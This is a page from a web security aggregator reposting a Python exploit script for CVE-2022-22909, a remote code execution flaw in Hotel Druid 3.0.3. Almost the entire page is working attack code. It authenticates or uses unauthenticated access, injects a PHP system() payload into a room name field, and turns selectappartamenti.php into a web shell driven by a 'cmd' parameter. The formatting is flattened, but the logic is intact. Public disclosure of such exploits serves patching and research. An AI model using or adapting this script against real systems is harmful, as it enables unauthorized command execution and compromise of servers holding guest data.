HackDig : Dig high-quality web security articles

Hotel Druid 3.0.3 Remote Code Execution

2022-02-20 08:15
# Exploit Title: Hotel Druid 3.0.3 - Remote Code Execution (RCE)# Date: 05/01/2022# Exploit Author: 0z09e (https://twitter.com/0z09e)# Vendor Homepage: https://www.hoteldruid.com/# Software Link: https://www.hoteldruid.com/download/hoteldruid_3.0.3.tar.gz# Version: 3.0.3# CVE : CVE-2022-22909#!/usr/bin/python3import requestsimport argparsedef login( target , username = "" , password = "", noauth=False):login_data = {"vers_hinc" : "1","nome_utente_phpr" : username,"password_phpr" : password} if not noauth:login_req = requests.post(f"{target}/inizio.php" , data=login_data , verify=False )if '<a class="nav" id="nb_men" href="./inizio.php?id_sessione=' in login_req.text:token = login_req.text.split('<a class="nav" id="nb_men" href="./inizio.php?id_sessione=')[1].split('">&nbsp;<b>')[0]anno = login_req.text.split('<input type="hidden" name="anno" value="')[1].split('">')[0]ret_data = {"token" : token , "anno" : anno}#print("ret data" + ret_data)return ret_dataelse:return Falseelse:login_req = requests.get(f"{target}/inizio.php" , verify=False )try:anno = login_req.text.split('<input type="hidden" name="anno" value="')[1].split('">')[0]token = ""ret_data = {"token" : token , "anno" : anno}return ret_dataexcept:return Falsedef check_privilege(target , anno , token=""):priv_req = requests.get(f"{target}/visualizza_tabelle.php?id_sessione={token}&tipo_tabella=appartamenti" , verify=False)#print(priv_req.text)if "Modify" in priv_req.text:return Trueelse:return Falsedef add_room(target , anno , token=""):add_room_data = { "anno": anno,"id_sessione": token,"n_app":"{${system($_REQUEST['cmd'])}}","crea_app":"SI","crea_letti":"","n_letti":"","tipo_tabella":"appartamenti"}add_req = requests.post(f"{target}/visualizza_tabelle.php" , data=add_room_data , verify=False)#print(add_req.text)if "has been added" in add_req.text:return Trueelse:return Falsedef test_code_execution(target):code_execution_req = requests.get(f"{target}/dati/selectappartamenti.php?cmd=id")if "uid=" in code_execution_req.text:return code_execution_req.text.split("n")[0]else:return Falsedef main():banner = """n /$$   /$$             /$$               /$$       /$$$$$$$                      /$$       /$$| $$  | $$            | $$              | $$      | $$__  $$                    |__/      | $$| $$  | $$  /$$$$$$  /$$$$$$    /$$$$$$ | $$      | $$   $$  /$$$$$$  /$$   /$$ /$$  /$$$$$$$| $$$$$$$$ /$$__  $$|_  $$_/   /$$__  $$| $$      | $$  | $$ /$$__  $$| $$  | $$| $$ /$$__  $$| $$__  $$| $$   $$  | $$    | $$$$$$$$| $$      | $$  | $$| $$  __/| $$  | $$| $$| $$  | $$| $$  | $$| $$  | $$  | $$ /$$| $$_____/| $$      | $$  | $$| $$      | $$  | $$| $$| $$  | $$| $$  | $$|  $$$$$$/  |  $$$$/|  $$$$$$$| $$      | $$$$$$$/| $$      |  $$$$$$/| $$|  $$$$$$$|__/  |__/ ______/    ___/   _______/|__/      |_______/ |__/       ______/ |__/ _______/nnExploit By - 0z09e (https://twitter.com/0z09e)nn"""parser = argparse.ArgumentParser()req_args = parser.add_argument_group('required arguments')req_args.add_argument("-t" ,"--target" , help="Target URL. Example : http://10.20.30.40/path/to/hoteldruid" , required=True)req_args.add_argument("-u" , "--username" , help="Username" , required=False)req_args.add_argument("-p" , "--password" , help="password", required=False)req_args.add_argument("--noauth" , action="store_true" , default=False , help="If No authentication is required to access the dashboard", required=False)args = parser.parse_args()                                                                         target = args.targetif target[-1] == "/":target = target[:-1]noauth = args.noauthusername = args.usernamepassword = args.passwordif noauth == False and (username == None or password == None):print('[-] Please provide the authentication method.' )quit()print(banner)if not noauth:print(f"[*] Logging in with the credential {username}:{password}")login_result = login(username = username , password = password , target = target)if login_result != False:token = login_result.get('token')anno = login_result.get('anno')else:print("[-] Login failed, Check your credential or check if login is required or not .")quit()else:print('[*] Trying to access the Dashboard.')login_result = login(username = username , password = password , target = target , noauth=True)if login_result != False:token = login_result.get('token')anno = login_result.get('anno') else:print('[-] Unable to access the dashboard, Maybe the dashboard is protected with credential.')exit()print("[*] Checking the privilege of the user.")if check_privilege(target= target , token=token , anno=anno):print("[+] User has the privilege to add room.")else:print("[-] User doesn't have the privilege to add room.")exit()print("[*] Adding a new room.")if add_room(target = target , anno=anno , token=token):print('[+] Room has been added successfully.')else:print('[-] Unknown error occured, unable to add room. Maybe the room has already been added')exit()print('[*] Testing code exection')output = test_code_execution(target = target)if output != False:print(f"[+] Code executed successfully, Go to {target}/dati/selectappartamenti.php and execute the code with the parameter 'cmd'.")print(f'[+] Example : {target}/dati/selectappartamenti.php?cmd=id')print(f"[+] Example Output : {output}")exit()else:print(f"[-] Code execution failed. If the Target is Windows, Check {target}/dati/selectappartamenti.php and try execute the code with the parameter 'cmd'. Example : {target}/dati/selectappartamenti.php?cmd=hostname")exit()main()            


Source: 5900202202-BLW/eussi/moc.ytirucesxc

Read:3150 | Comments:0 | Tags:No Tag

“Hotel Druid 3.0.3 Remote Code Execution”0 Comments

Submit A Comment

Name:

Email:

Blog :

Verification Code:

Announce

Share high-quality web security related articles with you:)
Tell me why you support me <3

Tag Cloud